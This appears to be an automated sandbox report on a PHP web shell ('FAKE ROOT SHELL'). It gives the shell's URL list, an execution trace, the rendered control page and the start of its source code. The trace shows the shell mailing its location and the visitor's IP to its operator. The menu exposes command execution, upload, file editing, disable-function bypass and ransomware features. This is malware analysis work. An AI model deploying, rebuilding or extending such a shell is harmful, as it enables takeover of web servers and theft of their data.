PHP Malware Analysis
Minishell-hemker.php
md5: 78018f7d9c4fcdee7258cd95815730a8
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
Encoding
Environment
Execution
Files
Input
Title
URLs
- http://localhost/uploads/Minishell-hemker.php (Traces)
- http://www (Original)
- http://www.clker.com/cliparts/c/S/7/m/x/U/gold-house-black-background-clip-art-hi.png (HTML, Original)
- http://www.homelandsecureit.com/wp-content/uploads/2011/01/security-padlock.gif (Original)
- http://www.zone-h.com/notify/single (Original)
- http://www.zone-h.org/archive/notifier=$nick (Original)
- http://www.zone-h.org/archive/notifier=$nick/published=0 (Original)
- https://fonts.googleapis.com/css?family=Cinzel:700 (HTML, Original)
- https://fonts.googleapis.com/css?family=Kelly+Slab (HTML, Original)
- https://img.wallpaper.sc/applewatch/images/312x390/applewatch-312x390-photoface-wallpaper_01351.jpg (HTML, Original)
- https://infocon.org/cons/Black%20Hat/Black%20Hat%20Logo%20small.jpg (HTML, Original)
- https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css (HTML, Original)
- https://wallpaper.sc/id/applewatch/wp-content/uploads/2018/08/applewatch-312x390-photoface-wallpaper_01348-312x312.jpg (HTML, Original)
- https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php (Original)
Deobfuscated PHP code
Failed to deobfuscate codeExecution traces
data/traces/78018f7d9c4fcdee7258cd95815730a8_trace-1676256006.7071.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:40:32.604969]
1 0 1 0.000147 393608
1 3 0 0.000926 561224 {main} 1 /var/www/html/uploads/Minishell-hemker.php 0 0
2 4 0 0.000946 561224 session_start 0 /var/www/html/uploads/Minishell-hemker.php 5 0
2 4 1 0.001001 561976
2 4 R TRUE
2 5 0 0.001018 561976 error_reporting 0 /var/www/html/uploads/Minishell-hemker.php 6 1 0
2 5 1 0.001033 562016
2 5 R 22527
2 6 0 0.001046 561976 set_time_limit 0 /var/www/html/uploads/Minishell-hemker.php 7 1 0
2 6 1 0.001061 562040
2 6 R FALSE
2 7 0 0.001075 562008 getcwd 0 /var/www/html/uploads/Minishell-hemker.php 102 0
2 7 1 0.001089 562056
2 7 R '/var/www/html/uploads'
1 A /var/www/html/uploads/Minishell-hemker.php 102 $path = '/var/www/html/uploads'
2 8 0 0.001118 562056 str_replace 0 /var/www/html/uploads/Minishell-hemker.php 104 3 '\\' '/' '/var/www/html/uploads'
2 8 1 0.001133 562152
2 8 R '/var/www/html/uploads'
1 A /var/www/html/uploads/Minishell-hemker.php 104 $path = '/var/www/html/uploads'
2 9 0 0.001157 562056 explode 0 /var/www/html/uploads/Minishell-hemker.php 105 2 '/' '/var/www/html/uploads'
2 9 1 0.001172 562632
2 9 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/Minishell-hemker.php 105 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/Minishell-hemker.php 107 $id = 0
1 A /var/www/html/uploads/Minishell-hemker.php 109 $a = TRUE
1 A /var/www/html/uploads/Minishell-hemker.php 107 $id = 1
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i = 0
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i++
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i++
1 A /var/www/html/uploads/Minishell-hemker.php 107 $id = 2
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i = 0
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i++
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i++
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i++
1 A /var/www/html/uploads/Minishell-hemker.php 107 $id = 3
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i = 0
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i++
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i++
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i++
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i++
1 A /var/www/html/uploads/Minishell-hemker.php 107 $id = 4
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i = 0
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i++
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i++
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i++
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i++
1 A /var/www/html/uploads/Minishell-hemker.php 115 $i++
2 10 0 0.001417 562560 error_reporting 0 /var/www/html/uploads/Minishell-hemker.php 481 1 0
2 10 1 0.001431 562600
2 10 R 0
2 11 0 0.001444 562560 set_time_limit 0 /var/www/html/uploads/Minishell-hemker.php 482 1 0
2 11 1 0.001457 562592
2 11 R FALSE
2 12 0 0.001470 562560 ini_set 0 /var/www/html/uploads/Minishell-hemker.php 483 2 'memory_limit' '-1'
2 12 1 0.001485 562664
2 12 R '128M'
2 13 0 0.001499 562560 ini_set 0 /var/www/html/uploads/Minishell-hemker.php 637 2 'output_buffering' 0
2 13 1 0.001514 562632
2 13 R FALSE
2 14 0 0.001527 562560 ini_set 0 /var/www/html/uploads/Minishell-hemker.php 638 2 'display_errors' 0
2 14 1 0.001541 562632
2 14 R ''
2 15 0 0.001554 562560 set_time_limit 0 /var/www/html/uploads/Minishell-hemker.php 639 1 0
2 15 1 0.001566 562592
2 15 R FALSE
2 16 0 0.001579 562560 ini_set 0 /var/www/html/uploads/Minishell-hemker.php 640 2 'memory_limit' '64M'
2 16 1 0.001592 562664
2 16 R '-1'
2 17 0 0.001605 562560 header 0 /var/www/html/uploads/Minishell-hemker.php 641 1 'Content-Type: text/html; charset=UTF-8'
2 17 1 0.001622 562736
2 17 R NULL
1 A /var/www/html/uploads/Minishell-hemker.php 642 $tujuanmail = 'fikriofficial4676@gmail.com'
1 A /var/www/html/uploads/Minishell-hemker.php 643 $x_path = 'http://localhost/uploads/Minishell-hemker.php'
1 A /var/www/html/uploads/Minishell-hemker.php 644 $pesan_alert = 'fix http://localhost/uploads/Minishell-hemker.php :p *IP Address : [ 127.0.0.1 ]'
2 18 0 0.001680 562936 mail 0 /var/www/html/uploads/Minishell-hemker.php 645 4 'fikriofficial4676@gmail.com' 'ACCESS' 'fix http://localhost/uploads/Minishell-hemker.php :p *IP Address : [ 127.0.0.1 ]' '[ 127.0.0.1 ]'
2 18 1 0.002448 563080
2 18 R FALSE
2 19 0 0.002484 562896 scandir 0 /var/www/html/uploads/Minishell-hemker.php 715 1 '/var/www/html/uploads'
2 19 1 0.002520 563528
2 19 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Minishell-hemker.php', 4 => 'data', 5 => 'prepend.php']
1 A /var/www/html/uploads/Minishell-hemker.php 715 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Minishell-hemker.php', 4 => 'data', 5 => 'prepend.php']
2 20 0 0.002562 563544 is_dir 0 /var/www/html/uploads/Minishell-hemker.php 726 1 '/var/www/html/uploads/.'
2 20 1 0.002579 563608
2 20 R TRUE
2 21 0 0.002593 563576 is_dir 0 /var/www/html/uploads/Minishell-hemker.php 726 1 '/var/www/html/uploads/..'
2 21 1 0.002609 563624
2 21 R TRUE
2 22 0 0.002622 563584 is_dir 0 /var/www/html/uploads/Minishell-hemker.php 726 1 '/var/www/html/uploads/.htaccess'
2 22 1 0.002638 563624
2 22 R FALSE
2 23 0 0.002652 563608 is_dir 0 /var/www/html/uploads/Minishell-hemker.php 726 1 '/var/www/html/uploads/Minishell-hemker.php'
2 23 1 0.002667 563664
2 23 R FALSE
2 24 0 0.002680 563600 is_dir 0 /var/www/html/uploads/Minishell-hemker.php 726 1 '/var/www/html/uploads/data'
2 24 1 0.002695 563624
2 24 R TRUE
2 25 0 0.002708 563584 is_writable 0 /var/www/html/uploads/Minishell-hemker.php 731 1 '/var/www/html/uploads/data'
2 25 1 0.002725 563624
2 25 R TRUE
2 26 0 0.002739 563584 perms 1 /var/www/html/uploads/Minishell-hemker.php 733 1 '/var/www/html/uploads/data'
3 27 0 0.002753 563584 fileperms 0 /var/www/html/uploads/Minishell-hemker.php 795 1 '/var/www/html/uploads/data'
3 27 1 0.002767 563624
3 27 R 16895
2 A /var/www/html/uploads/Minishell-hemker.php 795 $perms = 16895
2 A /var/www/html/uploads/Minishell-hemker.php 811 $info = 'd'
2 A /var/www/html/uploads/Minishell-hemker.php 824 $info .= 'r'
2 A /var/www/html/uploads/Minishell-hemker.php 825 $info .= 'w'
2 A /var/www/html/uploads/Minishell-hemker.php 828 $info .= 'x'
2 A /var/www/html/uploads/Minishell-hemker.php 831 $info .= 'r'
2 A /var/www/html/uploads/Minishell-hemker.php 832 $info .= 'w'
2 A /var/www/html/uploads/Minishell-hemker.php 835 $info .= 'x'
2 A /var/www/html/uploads/Minishell-hemker.php 838 $info .= 'r'
2 A /var/www/html/uploads/Minishell-hemker.php 839 $info .= 'w'
2 A /var/www/html/uploads/Minishell-hemker.php 842 $info .= 'x'
2 26 1 0.002896 563624
2 26 R 'drwxrwxrwx'
2 28 0 0.002911 563584 is_writable 0 /var/www/html/uploads/Minishell-hemker.php 734 1 '/var/www/html/uploads/data'
2 28 1 0.002953 563624
2 28 R TRUE
2 29 0 0.002974 563560 is_dir 0 /var/www/html/uploads/Minishell-hemker.php 726 1 '/var/www/html/uploads/prepend.php'
2 29 1 0.002991 563608
2 29 R FALSE
2 30 0 0.003005 563552 is_file 0 /var/www/html/uploads/Minishell-hemker.php 754 1 '/var/www/html/uploads/.'
2 30 1 0.003020 563576
2 30 R FALSE
2 31 0 0.003033 563544 is_file 0 /var/www/html/uploads/Minishell-hemker.php 754 1 '/var/www/html/uploads/..'
2 31 1 0.003048 563592
2 31 R FALSE
2 32 0 0.003061 563552 is_file 0 /var/www/html/uploads/Minishell-hemker.php 754 1 '/var/www/html/uploads/.htaccess'
2 32 1 0.003076 563592
2 32 R TRUE
2 33 0 0.003089 563552 filesize 0 /var/www/html/uploads/Minishell-hemker.php 755 1 '/var/www/html/uploads/.htaccess'
2 33 1 0.003102 563592
2 33 R 64
1 A /var/www/html/uploads/Minishell-hemker.php 755 $size = 0.0625
2 34 0 0.003126 563496 round 0 /var/www/html/uploads/Minishell-hemker.php 756 2 0.0625 3
2 34 1 0.003140 563568
2 34 R 0.063
1 A /var/www/html/uploads/Minishell-hemker.php 756 $size = 0.063
1 A /var/www/html/uploads/Minishell-hemker.php 760 $size = '0.063 KB'
2 35 0 0.003183 563592 is_writable 0 /var/www/html/uploads/Minishell-hemker.php 767 1 '/var/www/html/uploads/.htaccess'
2 35 1 0.003200 563632
2 35 R FALSE
2 36 0 0.003213 563592 is_readable 0 /var/www/html/uploads/Minishell-hemker.php 768 1 '/var/www/html/uploads/.htaccess'
2 36 1 0.003228 563632
2 36 R TRUE
2 37 0 0.003241 563592 perms 1 /var/www/html/uploads/Minishell-hemker.php 769 1 '/var/www/html/uploads/.htaccess'
3 38 0 0.003255 563592 fileperms 0 /var/www/html/uploads/Minishell-hemker.php 795 1 '/var/www/html/uploads/.htaccess'
3 38 1 0.003268 563632
3 38 R 33188
2 A /var/www/html/uploads/Minishell-hemker.php 795 $perms = 33188
2 A /var/www/html/uploads/Minishell-hemker.php 805 $info = '-'
2 A /var/www/html/uploads/Minishell-hemker.php 824 $info .= 'r'
2 A /var/www/html/uploads/Minishell-hemker.php 825 $info .= 'w'
2 A /var/www/html/uploads/Minishell-hemker.php 828 $info .= '-'
2 A /var/www/html/uploads/Minishell-hemker.php 831 $info .= 'r'
2 A /var/www/html/uploads/Minishell-hemker.php 832 $info .= '-'
2 A /var/www/html/uploads/Minishell-hemker.php 835 $info .= '-'
2 A /var/www/html/uploads/Minishell-hemker.php 838 $info .= 'r'
2 A /var/www/html/uploads/Minishell-hemker.php 839 $info .= '-'
2 A /var/www/html/uploads/Minishell-hemker.php 842 $info .= '-'
2 37 1 0.003391 563632
2 37 R '-rw-r--r--'
2 39 0 0.003405 563592 is_writable 0 /var/www/html/uploads/Minishell-hemker.php 770 1 '/var/www/html/uploads/.htaccess'
2 39 1 0.003421 563632
2 39 R FALSE
2 40 0 0.003434 563592 is_readable 0 /var/www/html/uploads/Minishell-hemker.php 770 1 '/var/www/html/uploads/.htaccess'
2 40 1 0.003450 563632
2 40 R TRUE
2 41 0 0.003463 563616 is_file 0 /var/www/html/uploads/Minishell-hemker.php 754 1 '/var/www/html/uploads/Minishell-hemker.php'
2 41 1 0.003479 563672
2 41 R TRUE
2 42 0 0.003492 563632 filesize 0 /var/www/html/uploads/Minishell-hemker.php 755 1 '/var/www/html/uploads/Minishell-hemker.php'
2 42 1 0.003505 563672
2 42 R 31979
1 A /var/www/html/uploads/Minishell-hemker.php 755 $size = 31.2294921875
2 43 0 0.003529 563512 round 0 /var/www/html/uploads/Minishell-hemker.php 756 2 31.2294921875 3
2 43 1 0.003543 563584
2 43 R 31.229
1 A /var/www/html/uploads/Minishell-hemker.php 756 $size = 31.229
1 A /var/www/html/uploads/Minishell-hemker.php 760 $size = '31.229 KB'
2 44 0 0.003580 563632 is_writable 0 /var/www/html/uploads/Minishell-hemker.php 767 1 '/var/www/html/uploads/Minishell-hemker.php'
2 44 1 0.003595 563672
2 44 R FALSE
2 45 0 0.003609 563632 is_readable 0 /var/www/html/uploads/Minishell-hemker.php 768 1 '/var/www/html/uploads/Minishell-hemker.php'
2 45 1 0.003624 563672
2 45 R TRUE
2 46 0 0.003636 563632 perms 1 /var/www/html/uploads/Minishell-hemker.php 769 1 '/var/www/html/uploads/Minishell-hemker.php'
3 47 0 0.003649 563632 fileperms 0 /var/www/html/uploads/Minishell-hemker.php 795 1 '/var/www/html/uploads/Minishell-hemker.php'
3 47 1 0.003662 563672
3 47 R 33204
2 A /var/www/html/uploads/Minishell-hemker.php 795 $perms = 33204
2 A /var/www/html/uploads/Minishell-hemker.php 805 $info = '-'
2 A /var/www/html/uploads/Minishell-hemker.php 824 $info .= 'r'
2 A /var/www/html/uploads/Minishell-hemker.php 825 $info .= 'w'
2 A /var/www/html/uploads/Minishell-hemker.php 828 $info .= '-'
2 A /var/www/html/uploads/Minishell-hemker.php 831 $info .= 'r'
2 A /var/www/html/uploads/Minishell-hemker.php 832 $info .= 'w'
2 A /var/www/html/uploads/Minishell-hemker.php 835 $info .= '-'
2 A /var/www/html/uploads/Minishell-hemker.php 838 $info .= 'r'
2 A /var/www/html/uploads/Minishell-hemker.php 839 $info .= '-'
2 A /var/www/html/uploads/Minishell-hemker.php 842 $info .= '-'
2 46 1 0.003782 563672
2 46 R '-rw-rw-r--'
2 48 0 0.003796 563632 is_writable 0 /var/www/html/uploads/Minishell-hemker.php 770 1 '/var/www/html/uploads/Minishell-hemker.php'
2 48 1 0.003812 563672
2 48 R FALSE
2 49 0 0.003825 563632 is_readable 0 /var/www/html/uploads/Minishell-hemker.php 770 1 '/var/www/html/uploads/Minishell-hemker.php'
2 49 1 0.003840 563672
2 49 R TRUE
2 50 0 0.003854 563608 is_file 0 /var/www/html/uploads/Minishell-hemker.php 754 1 '/var/www/html/uploads/data'
2 50 1 0.003873 563632
2 50 R FALSE
2 51 0 0.003886 563600 is_file 0 /var/www/html/uploads/Minishell-hemker.php 754 1 '/var/www/html/uploads/prepend.php'
2 51 1 0.003902 563648
2 51 R TRUE
2 52 0 0.003915 563608 filesize 0 /var/www/html/uploads/Minishell-hemker.php 755 1 '/var/www/html/uploads/prepend.php'
2 52 1 0.003929 563648
2 52 R 57
1 A /var/www/html/uploads/Minishell-hemker.php 755 $size = 0.0556640625
2 53 0 0.003953 563504 round 0 /var/www/html/uploads/Minishell-hemker.php 756 2 0.0556640625 3
2 53 1 0.003966 563576
2 53 R 0.056
1 A /var/www/html/uploads/Minishell-hemker.php 756 $size = 0.056
1 A /var/www/html/uploads/Minishell-hemker.php 760 $size = '0.056 KB'
2 54 0 0.004102 563608 is_writable 0 /var/www/html/uploads/Minishell-hemker.php 767 1 '/var/www/html/uploads/prepend.php'
2 54 1 0.004119 563648
2 54 R FALSE
2 55 0 0.004133 563608 is_readable 0 /var/www/html/uploads/Minishell-hemker.php 768 1 '/var/www/html/uploads/prepend.php'
2 55 1 0.004149 563648
2 55 R TRUE
2 56 0 0.004162 563608 perms 1 /var/www/html/uploads/Minishell-hemker.php 769 1 '/var/www/html/uploads/prepend.php'
3 57 0 0.004175 563608 fileperms 0 /var/www/html/uploads/Minishell-hemker.php 795 1 '/var/www/html/uploads/prepend.php'
3 57 1 0.004191 563648
3 57 R 33261
2 A /var/www/html/uploads/Minishell-hemker.php 795 $perms = 33261
2 A /var/www/html/uploads/Minishell-hemker.php 805 $info = '-'
2 A /var/www/html/uploads/Minishell-hemker.php 824 $info .= 'r'
2 A /var/www/html/uploads/Minishell-hemker.php 825 $info .= 'w'
2 A /var/www/html/uploads/Minishell-hemker.php 828 $info .= 'x'
2 A /var/www/html/uploads/Minishell-hemker.php 831 $info .= 'r'
2 A /var/www/html/uploads/Minishell-hemker.php 832 $info .= '-'
2 A /var/www/html/uploads/Minishell-hemker.php 835 $info .= 'x'
2 A /var/www/html/uploads/Minishell-hemker.php 838 $info .= 'r'
2 A /var/www/html/uploads/Minishell-hemker.php 839 $info .= '-'
2 A /var/www/html/uploads/Minishell-hemker.php 842 $info .= 'x'
2 56 1 0.004316 563648
2 56 R '-rwxr-xr-x'
2 58 0 0.004330 563608 is_writable 0 /var/www/html/uploads/Minishell-hemker.php 770 1 '/var/www/html/uploads/prepend.php'
2 58 1 0.004347 563648
2 58 R FALSE
2 59 0 0.004360 563608 is_readable 0 /var/www/html/uploads/Minishell-hemker.php 770 1 '/var/www/html/uploads/prepend.php'
2 59 1 0.004376 563648
2 59 R TRUE
1 3 1 0.004393 563544
0.004439 378120
TRACE END [2023-02-13 00:40:32.609287]
Generated HTML code
<html><head><title>./FAKE ROOT SHELL</title>
<link rel="icon" href="https://infocon.org/cons/Black%20Hat/Black%20Hat%20Logo%20small.jpg">
<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Cinzel:700" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
<style>
body{
font-family: Kelly Slab;
background-color: black;
color:white;
}
p{
word-spacing: 20px;
font-family: Cinzel;
}
#content tr:hover{
background-color: #0058FF;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-image:url(https://wallpaper.sc/id/applewatch/wp-content/uploads/2018/08/applewatch-312x390-photoface-wallpaper_01348-312x312.jpg);
}
table{
border: 1px #000000 solid;
background-image:url(https://img.wallpaper.sc/applewatch/images/312x390/applewatch-312x390-photoface-wallpaper_01351.jpg);
}
a{
color:white;
text-decoration: none;
}
a:hover{
color:blue;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
.inpute{
border-style: solid;
border-color: white;
background-color: white;
color: black;
padding:5px;
text-align: center;
}
.selecte{
border-style: solid;
padding:6px;
border-color:white;
background-color: #ff751a;
color: black;
}
.submite{
border-style: solid;
border-color: #4CAF50;
background-color: transparent;
color: white;
padding:6px;
}
</style>
</head><body><center> <font face="Kelly Slab" color="white" size="7px">[ + ] --- <u><font color="lime">./FAKE ROOT SHELL</font></u>--- [ + ]</font> <br><center><br>
<div style="height:auto;">
<center>
<div style=" border: 7px double; border-color:orange;height:160px;width:100%; color:white;"><p>
<a href="?dir=$dir&do=zoneh">ZONE-H </a>
<a href="?dir=$dir&do=youtube">YOUTUBE</a>
<a href="?dir=$dir&votr=cmd">COMMAND</a>
<a href="?dir=$dir&votr=sym">SYMLINK</a>
<a href="?dir=$dir&do=jumping">JUMPING </a><br><br>
<a href="?dir=$dir&do=bypass">BYPASS_DISABLE</a>
<a href="?dir=$dir&do=adminer">ADMINER </a>
<a href="?dir=$dir&do=hash">PASSWORD_HASH</a>
<a href="?dir=$dir&do=ransom">RANSOMWARE</a><br><br>
</p>
</div></center></div> </center><br>
<center>
</center><table style="background-color:black;">
<tbody><tr><td><font style="background-color:black;" color="white"><a style="color:red;" href="?"><img style="height:30px;width:30px;" src="http://www.clker.com/cliparts/c/S/7/m/x/U/gold-house-black-background-clip-art-hi.png"></a> :</font> <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</td></tr><tr><td><br><form enctype="multipart/form-data" method="POST">
<font color="white">File Upload :</font> <input type="file" name="file" style="font-family:Kelly Slab;font-size:15;background:blue;color:gold;border:2px solid red;">
<input type="submit" value="Upload" style="margin-top:4px;height:27px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:gold;border:2px solid red;border-radius:5px">
</form>
</td></tr>
</tbody></table><br><center></center><div id="content"><table width="100%" border="2" style="border-color:#8B4513;" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<td><center>NAME</center></td>
<td><center>SIZE</center></td>
<td><center>PERMISSION</center></td>
<td><center>ACTION</center></td>
</tr><tr class="first"></tr><tr>
<td><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII="><a href="?filesrc=/var/www/html/Minishell-hemker.php&path=/var/www/html"> Minishell-hemker.php</a></td>
<td><center>31.229 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt" style="margin-top:6px;width:120px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
<option value="">SELECT</option>
<option value="delete">DELETE</option>
<option value="chmod">CHMOD</option>
<option value="rename">RENAME</option>
<option value="edit">EDIT</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="Minishell-hemker.php">
<input type="hidden" name="path" value="/var/www/html/Minishell-hemker.php">
<input type="submit" value="GO" style="margin-top:6px;width:27px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
</form></center></td>
</tr><tr>
<td><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII="><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html"> beneri.se_malware_analysis</a></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt" style="margin-top:6px;width:120px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
<option value="">SELECT</option>
<option value="delete">DELETE</option>
<option value="chmod">CHMOD</option>
<option value="rename">RENAME</option>
<option value="edit">EDIT</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" value="GO" style="margin-top:6px;width:27px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
</form></center></td>
</tr></tbody></table>
</div>
<center><br><font face="Kelly Slab" color="white" style="text-shadow: 0 0 20px blue, 0 0 5px blue, 0 0 7px blue, 0 0 45px blue; font-weight:bold: blue; font-size:30px">./Fake Root is Unknown People</font></center><font face="Kelly Slab" color="white" style="text-shadow: 0 0 20px blue, 0 0 5px blue, 0 0 7px blue, 0 0 45px blue; font-weight:bold: blue; font-size:30px">
</font></center></body></html>Original PHP code
<?php
// --- php shell
session_start();
error_reporting(0);
set_time_limit(0);
echo '<!DOCTYPE HTML>
<html>
<head><title>./FAKE ROOT SHELL</title>
<link rel="icon" href="https://infocon.org/cons/Black%20Hat/Black%20Hat%20Logo%20small.jpg">
<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Cinzel:700" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
<style>
body{
font-family: Kelly Slab;
background-color: black;
color:white;
}
p{
word-spacing: 20px;
font-family: Cinzel;
}
#content tr:hover{
background-color: #0058FF;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-image:url(https://wallpaper.sc/id/applewatch/wp-content/uploads/2018/08/applewatch-312x390-photoface-wallpaper_01348-312x312.jpg);
}
table{
border: 1px #000000 solid;
background-image:url(https://img.wallpaper.sc/applewatch/images/312x390/applewatch-312x390-photoface-wallpaper_01351.jpg);
}
a{
color:white;
text-decoration: none;
}
a:hover{
color:blue;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
.inpute{
border-style: solid;
border-color: white;
background-color: white;
color: black;
padding:5px;
text-align: center;
}
.selecte{
border-style: solid;
padding:6px;
border-color:white;
background-color: #ff751a;
color: black;
}
.submite{
border-style: solid;
border-color: #4CAF50;
background-color: transparent;
color: white;
padding:6px;
}
</style>
<center> <font face="Kelly Slab" color="white" size="7px">[ + ] --- <u><font color="lime">./FAKE ROOT SHELL</font></u>--- [ + ]</font></script> <br><center><br>
</head>
<div style="height:auto;" >
<body><center>
<div style=" border: 7px double; border-color:orange;height:160px;width:100%; color:white;" ><p>
<a href="?dir=$dir&do=zoneh">ZONE-H </a>
<a href="?dir=$dir&do=youtube">YOUTUBE</a>
<a href="?dir=$dir&votr=cmd">COMMAND</a>
<a href="?dir=$dir&votr=sym">SYMLINK</a>
<a href="?dir=$dir&do=jumping">JUMPING </a><br><br>
<a href="?dir=$dir&do=bypass">BYPASS_DISABLE</a>
<a href="?dir=$dir&do=adminer">ADMINER </a>
<a href="?dir=$dir&do=hash">PASSWORD_HASH</a>
<a href="?dir=$dir&do=ransom">RANSOMWARE</a><br><br>
</p>
</center></div> </center><br></td>
</tr>
<table style="background-color:black;" >
<tr><td><font style="background-color:black;" color="white"><a style="color:red;" href="?"><img style="height:30px;width:30px;" src="http://www.clker.com/cliparts/c/S/7/m/x/U/gold-house-black-background-clip-art-hi.png"></a> :</font> ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
